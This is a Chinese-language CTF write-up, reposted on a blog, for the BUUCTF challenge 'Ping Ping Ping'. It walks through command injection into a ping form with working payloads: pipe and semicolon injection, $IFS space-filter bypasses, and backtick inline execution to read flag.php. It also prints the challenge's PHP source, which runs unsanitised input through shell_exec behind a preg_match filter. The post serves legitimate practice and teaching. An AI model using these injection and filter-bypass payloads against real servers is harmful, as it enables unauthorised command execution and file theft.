[GXYCTF2019]Ping Ping Ping 1

2021 年 3 月 6 日
筆記
BUUCTF日記

進入介面

根據提示進行ping訊號

看到網頁的內容就想到經典的Linux命令執行，使用命令執行的管道符 ” | “嘗試列出文件

FLAG應該在Flag.php裡面

構造playload進行提取

//3747c9d4-f879-4d08-8c70-eaf4963f4e8c.node3.buuoj.cn/?ip=110.242.68.3|cat flag.php

提示：「/?ip= fxck your space!」，space暗示我們存在空格過濾,嘗試構造語句來繞過空格

$IFS
${IFS}
$IFS$1 // $1改成$加其他數字貌似都行
< 
<> 
{cat,flag.php}  // 用逗號實現了空格功能
%20 
%09

出現新的提示「/?ip= 1fxck your symbol!」

說明仍然存在「flag」過濾，聯想之前做的BUU題目，提示應該藏在另外一個php文件(index.php)裡面，於是利用上面的繞過空格來構造Playload進行查看index.php

http://3747c9d4-f879-4d08-8c70-eaf4963f4e8c.node3.buuoj.cn/?ip=110.242.68.3|cat${IFS}index.php

經行php程式碼審計

/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match); //preg_math函數過濾掉的字元
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){      //同上
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){   //同上
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);   
  echo "

";
  print_r($a);
}

?>

內聯輸出：使用反引號 “代替 |，經反引號的輸出命令轉換為輸出

構造playload

http://3747c9d4-f879-4d08-8c70-eaf4963f4e8c.node3.buuoj.cn/?ip=110.242.68.3;cat$IFS$9%60ls%60

得到flag

flag = "flag{1fe19100-c980-45f2-9625-262cbd69f6fa}"

考點：

PHP preg_match() 函數過濾

內聯執行：使用反引號 “代替 |，經反引號的輸出命令轉換為輸出

管道符

Tags: BUUCTF日記

[GXYCTF2019]Ping Ping Ping 1

進入介面

PHP preg_match() 函數過濾

VirMach 便宜 VPS

QNews

[GXYCTF2019]Ping Ping Ping 1

進入介面<img alt="" height="560" loading="lazy" src="//img2020.cnblogs.com/blog/2291079/202103/2291079-20210306134750135-579910728.png" style="" width="832"/>

PHP preg_match() 函數過濾

分享此文：

Related Posts

Mybatis快速入門

linux 中斷底半部機制對比（任務隊列，工作隊列，軟中斷）–由linux RS485引出的血案【轉】

耐克代工廠：玩覓全掌氣墊跑鞋99元新低 京東299元

通過窮舉法快速破解excel或word加密文檔最高15位密碼

VirMach 便宜 VPS

QNews

熱門搜尋

進入介面

耐克代工廠：玩覓全掌氣墊跑鞋99元新低京東299元